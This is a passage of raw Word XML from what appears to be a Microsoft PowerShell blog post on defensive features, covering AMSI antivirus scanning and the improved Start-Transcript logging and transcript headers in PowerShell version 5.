          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D979F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Copyright (C) Microsoft Corporation. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D979F1" w:rsidRPr="00D979F1" w:rsidRDefault="00D979F1" w:rsidP="00D979F1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D979F1" w:rsidRDefault="00D979F1" w:rsidP="00D979F1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D979F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C:\temp\eicar_test.vbs(3, 1) Microsoft VBScript runtime error: This script contains malicious content and has been blocked by your antivirus software.: 'eval'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451F58" w:rsidRDefault="00451F58" w:rsidP="00451F58">
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Windows Defender </w:t>
      </w:r>
      <w:r w:rsidR="003F7B8D">
        <w:t xml:space="preserve">already </w:t>
      </w:r>
      <w:r w:rsidR="0069612A">
        <w:t xml:space="preserve">responds to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AMSI </w:t>
      </w:r>
      <w:r w:rsidR="0069612A">
        <w:t xml:space="preserve">requests for content scans </w:t>
      </w:r>
      <w:r>
        <w:t>on Windows 10</w:t>
      </w:r>
      <w:r w:rsidR="00F2749A">
        <w:t xml:space="preserve"> – protecting applications that request scans of potentially malicious content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003A2F00">
        <w:t>In addition, t</w:t>
      </w:r>
      <w:r w:rsidR="00A46FB1">
        <w:t xml:space="preserve">he AMSI interface is an open standard, so any </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">other Antivirus vendor can implement support </w:t>
      </w:r>
      <w:r w:rsidR="00A46FB1">
        <w:t>for these requests as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D979F1" w:rsidRDefault="00D339CD" w:rsidP="00D339CD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidR="008275ED" w:rsidRPr="008275ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>♥</w:t>
      </w:r>
      <w:r w:rsidR="008275ED">
        <w:t xml:space="preserve"> the Blue Team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D339CD" w:rsidRDefault="009238A4" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">When you take </w:t>
      </w:r>
      <w:r w:rsidR="006174D0">
        <w:t xml:space="preserve">an assume-breach mindset, </w:t>
      </w:r>
      <w:r w:rsidR="008275ED">
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r w:rsidR="00196334">
        <w:t xml:space="preserve">have to </w:t>
      </w:r>
      <w:r w:rsidR="008275ED">
        <w:t>assume that an attacker is already on your system. But then you’re left with question</w:t>
      </w:r>
      <w:r w:rsidR="00380CAD">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A0125D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008275ED">
        <w:t>What did they do? What systems did they connect to?</w:t>
      </w:r>
      <w:r w:rsidR="00B5404B">
        <w:t xml:space="preserve"> Was any dynamic code invoked, and what was it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5404B" w:rsidRDefault="00B5404B" w:rsidP="001B7BE1">
      <w:r>
        <w:t>PowerShell version 5 (included in Windows 10, and also available for earlier operating systems through the Windows Management Framework) has made significant strides in making sure that the Blue Team has the information it needs to answer these questions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A339D2" w:rsidRPr="00A339D2" w:rsidRDefault="00A339D2" w:rsidP="00A339D2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A339D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>KB 3000850 for PowerShell v4 on Windows 8.1 also includes many of these features, as called out below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012548" w:rsidRDefault="00012548" w:rsidP="00012548">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PowerShell version 5 builds on the already strong </w:t>
      </w:r>
      <w:r w:rsidR="000E05DA">
        <w:t xml:space="preserve">infrastructure </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that PowerShell version 4 </w:t>
      </w:r>
      <w:r w:rsidR="000E05DA">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>and below</w:t>
      </w:r>
      <w:r w:rsidR="000E05DA">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>offer</w:t>
      </w:r>
      <w:r w:rsidR="000E05DA">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: transcription, module logging, and more. For more information about PowerShell Security Best Practices in these environments, see </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00887494">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://blogs.msdn.com/b/powershell/archive/2013/12/16/powershell-security-best-practices.aspx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. In addition, FireEye has </w:t>
      </w:r>
      <w:r w:rsidR="000E05DA">
        <w:t xml:space="preserve">published an excellent </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">document on Investigating PowerShell Attacks: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00887494">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.fireeye.com/resources/pdfs/fireeye-lazanciyan-investigating-powershell-attacks.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00973A93">
        <w:t xml:space="preserve">. This document goes into great detail for </w:t>
      </w:r>
      <w:r w:rsidR="001370DA">
        <w:t>both proactive and reactive techniques</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D400F" w:rsidRDefault="005D400F" w:rsidP="006174D0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Over-the-shoulder transcription</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D400F" w:rsidRDefault="002C1FD3" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">One of the quickest ways </w:t>
      </w:r>
      <w:r w:rsidR="003C38A0">
        <w:t xml:space="preserve">to get a summary of what’s </w:t>
      </w:r>
      <w:r w:rsidR="00795A57">
        <w:t xml:space="preserve">happening in </w:t>
      </w:r>
      <w:r w:rsidR="003C38A0">
        <w:t>a PowerShell session is to look over the shoulder of the person typing.</w:t>
      </w:r>
      <w:r w:rsidR="00E16E73">
        <w:t xml:space="preserve"> You see their commands, the output of those commands</w:t>
      </w:r>
      <w:r w:rsidR="00095363">
        <w:t>, and all is well.</w:t>
      </w:r>
      <w:r w:rsidR="00AF7F9E">
        <w:t xml:space="preserve"> Or it’s not, but at least you’ll know.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5B69" w:rsidRDefault="007503AF" w:rsidP="005C5B69">
      <w:r>
        <w:t xml:space="preserve">PowerShell versions 4 and prior include support for over-the-shoulder transcription through the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Start-Transcript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
      <w:r w:rsidR="00AF7F9E">
        <w:t xml:space="preserve"> However, setting up ubiquitous transcription of PowerShell sessions </w:t>
      </w:r>
      <w:r w:rsidR="007B3F97">
        <w:t xml:space="preserve">is complex and error-prone. </w:t>
      </w:r>
      <w:r w:rsidR="00434E03">
        <w:t xml:space="preserve">You need to include the command </w:t>
      </w:r>
      <w:r w:rsidR="00142F39">
        <w:t xml:space="preserve">in the system startup profile of every system, and also </w:t>
      </w:r>
      <w:r w:rsidR="00610CA4">
        <w:t xml:space="preserve">need to </w:t>
      </w:r>
      <w:r w:rsidR="00142F39">
        <w:t xml:space="preserve">add significant amounts of auditing to </w:t>
      </w:r>
      <w:r w:rsidR="00E1013C">
        <w:t xml:space="preserve">flag </w:t>
      </w:r>
      <w:r w:rsidR="00142F39">
        <w:t xml:space="preserve">attackers </w:t>
      </w:r>
      <w:r w:rsidR="00E1013C">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00255EE7">
        <w:t>attempt</w:t>
      </w:r>
      <w:r w:rsidR="00142F39">
        <w:t xml:space="preserve"> to disable transcription</w:t>
      </w:r>
      <w:r w:rsidR="005C5B69">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5B69" w:rsidRDefault="008301F5" w:rsidP="005C5B69">
      <w:r>
        <w:t xml:space="preserve">A secondary issue is that transcription was only supported in the interactive PowerShell </w:t>
      </w:r>
      <w:r w:rsidR="00AE4CFB">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">onsole. </w:t>
      </w:r>
      <w:r w:rsidR="00A723E5">
        <w:t xml:space="preserve">Transcription of remoting sessions were not supported, nor </w:t>
      </w:r>
      <w:r w:rsidR="00AF1CD1">
        <w:t>was transcription</w:t>
      </w:r>
      <w:r w:rsidR="00A723E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B87A8E">
        <w:t>in non-console hosts such as the PowerShell ISE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6C26" w:rsidRDefault="0086441E" w:rsidP="005C5B69">
      <w:r>
        <w:t xml:space="preserve">In PowerShell version 5 and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A339D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>KB 3000850</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Start-Transcript</w:t>
      </w:r>
      <w:r w:rsidR="005859FB">
        <w:t xml:space="preserve"> now emits structured objects when you start a transcript (the </w:t>
      </w:r>
      <w:r w:rsidR="005859FB" w:rsidRPr="000E2426">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidR="005859FB">
        <w:t xml:space="preserve"> property is useful), and has added much more useful information to its header:</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3 [C:\temp]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&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$transcript</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Start-Transcript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                              </w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                                                4 [C:\temp]                                                                                                                                                     &gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$transcript</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                             D:\Documents\PowerShell_transcript.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COMPUTER</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">16._o1d005+.20150403141829.txt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5 [C:\temp]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&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Get-Content</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$transcript</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>-Head</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F4444B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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Windows PowerShell transcript start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Start time: 20150403141829                                                                                                                                      Username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONTOSO</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                       RunAs User: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONTOSO</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                     Machine: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COMPUTER</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">16 (Microsoft Windows NT 6.3.9600.0)                                                                                                            Host Application: C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005859FB" w:rsidRPr="005859FB" w:rsidRDefault="005859FB" w:rsidP="005859FB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="01245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EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Process ID: 25996     </w:t>
      </w:r>
      <w:r w:rsidR="009043AE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="009043AE" w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>**********************</w:t>
      </w:r>
      <w:r w:rsidRPr="005859FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003114C" w:rsidRDefault="005859FB" w:rsidP="005859FB">
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">The filename now includes the computer that generated the transcript, a ‘hash breaker’ to prevent transcript collisions, and </w:t>
      </w:r>
      <w:r w:rsidR="00DF1381">
        <w:t>increased</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> granularity in the transcript start time.</w:t>
      </w:r>
      <w:r w:rsidR="00252ACB">
        <w:t xml:space="preserve"> While PowerShell v4 and below let you control the output path, you were then forced to properly randomize the transcript filename yourself. To improve this situation, we’ve added the </w:t>
      </w:r>
      <w:r w:rsidR="00252ACB" w:rsidRPr="00252ACB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–OutputDirectory</w:t>
      </w:r>
      <w:r w:rsidR="00252ACB">
        <w:t xml:space="preserve"> parameter to Start-Transcript.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C38A0" w:rsidRDefault="003E2D7F" w:rsidP="005859FB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidR="00252ACB">
        <w:t xml:space="preserve">header content, </w:t>
      </w:r>
      <w:r w:rsidR="00160346">
        <w:t xml:space="preserve">the “Username” and “RunAs User” will </w:t>
      </w:r>
      <w:r w:rsidR="00252ACB">
        <w:t xml:space="preserve">normally </w:t>
      </w:r>
      <w:r w:rsidR="00160346">
        <w:t>be the same</w:t>
      </w:r>
      <w:r w:rsidR="00724CBB">
        <w:t>. I</w:t>
      </w:r>
      <w:r w:rsidR="00160346">
        <w:t xml:space="preserve">f you’ve </w:t>
      </w:r>
      <w:r w:rsidR="00724CBB">
        <w:t xml:space="preserve">enabled impersonation on a </w:t>
      </w:r>
      <w:r w:rsidR="00AF79C5">
        <w:t xml:space="preserve">constrained </w:t>
      </w:r>
      <w:r w:rsidR="00724CBB">
        <w:t xml:space="preserve">PowerShell remoting endpoint (i.e.: </w:t>
      </w:r>
      <w:r w:rsidR="000D5B67">
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidR="00724CBB">
        <w:t>Just Enough Administration), the “Username” field represent</w:t>
      </w:r>
      <w:r w:rsidR="00903BE5">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00724CBB">
        <w:t xml:space="preserve"> the connected user while the “RunAs User” represent</w:t>
      </w:r>
      <w:r w:rsidR="00903BE5">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="00724CBB">
